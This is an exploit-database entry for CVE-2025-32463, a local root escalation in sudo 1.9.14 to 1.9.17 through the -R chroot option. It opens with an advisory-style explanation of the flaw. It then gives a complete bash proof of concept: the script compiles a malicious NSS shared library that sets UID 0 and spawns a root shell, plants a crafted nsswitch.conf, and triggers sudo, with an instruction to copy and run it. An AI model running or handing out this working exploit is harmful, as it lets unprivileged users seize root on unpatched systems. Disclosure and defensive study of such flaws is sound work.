📄 Sudo chroot 1.9.17 Privilege Escalation

Exploit Title: Sudo chroot 1.9.17 - Local Privilege Escalation
    Google Dork: not aplicable
    Date: Mon, 30 Jun 2025
    Exploit Author: Stratascale
    Vendor Homepage:https://salsa.debian.org/sudo-team/sudo
    Software Link:
    Version: Sudo versions 1.9.14 to 1.9.17 inclusive
    Tested on: Kali Rolling 2025-7-3
    CVE : CVE-2025-32463
    
    *Version running today in Kali:*
    https://pkg.kali.org/news/640802/sudo-1916p2-2-imported-into-kali-rolling/
    
    *Background*
    
    An attacker can leverage sudo's -R (--chroot) option to run
    arbitrary commands as root, even if they are not listed in the
    sudoers file.
    
    Sudo versions affected:
    
        Sudo versions 1.9.14 to 1.9.17 inclusive are affected.
    
    CVE ID:
    
        This vulnerability has been assigned CVE-2025-32463 in the
        Common Vulnerabilities and Exposures database.
    
    Details:
    
        Sudo's -R (--chroot) option is intended to allow the user to
        run a command with a user-selected root directory if the sudoers
        file allows it.  A change was made in sudo 1.9.14 to resolve
        paths via chroot() using the user-specified root directory while
        the sudoers file was still being evaluated.  It is possible for
        an attacker to trick sudo into loading an arbitrary shared
        library by creating an /etc/nsswitch.conf file under the
        user-specified root directory.
    
        The change from sudo 1.9.14 has been reverted in sudo 1.9.17p1
        and the chroot feature has been marked as deprecated.  It will
        be removed entirely in a future sudo release.  Because of the
        way sudo resolves commands, supporting a user-specified chroot
        directory is error-prone and this feature does not appear to
        be widely used.
    
        A more detailed description of the bug and its effects can be
        found in the Stratascale advisory:
        https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
    
    Impact:
    
        On systems that support /etc/nsswitch.conf a user may be able
        to run arbitrary commands as root.
    
    *Exploit:*
    
    *Verify the sudo version running: sudo --versionIf is vulnerable, copy and
    paste the following code and run it.*
    *----------------------*
    #!/bin/bash
    # sudo-chwoot.sh – PoC CVE-2025-32463
    set -e
    
    STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
    cd "$STAGE"
    
    # 1. NSS library
    cat > woot1337.c <<'EOF'
    #include <stdlib.h>
    #include <unistd.h>
    
    __attribute__((constructor))
    void woot(void) {
        setreuid(0,0);          /* change to UID 0 */
        setregid(0,0);          /* change  to GID 0 */
        chdir("/");             /* exit from chroot */
        execl("/bin/bash","/bin/bash",NULL); /* root shell */
    }
    EOF
    
    # 2. Mini chroot with toxic nsswitch.conf
    mkdir -p woot/etc libnss_
    echo "passwd: /woot1337" > woot/etc/nsswitch.conf
    cp /etc/group woot/etc            # make getgrnam() not fail
    
    # 3. compile libnss_
    gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
    
    echo "[*] Running exploit…"
    sudo -R woot woot                 # (-R <dir> <cmd>)
                                       # • the first “woot” is chroot
                                       # • the second “woot” is and inexistent
    command
                                       #   (only needs resolve the user)
    
    rm -rf "$STAGE"
    *----------------------*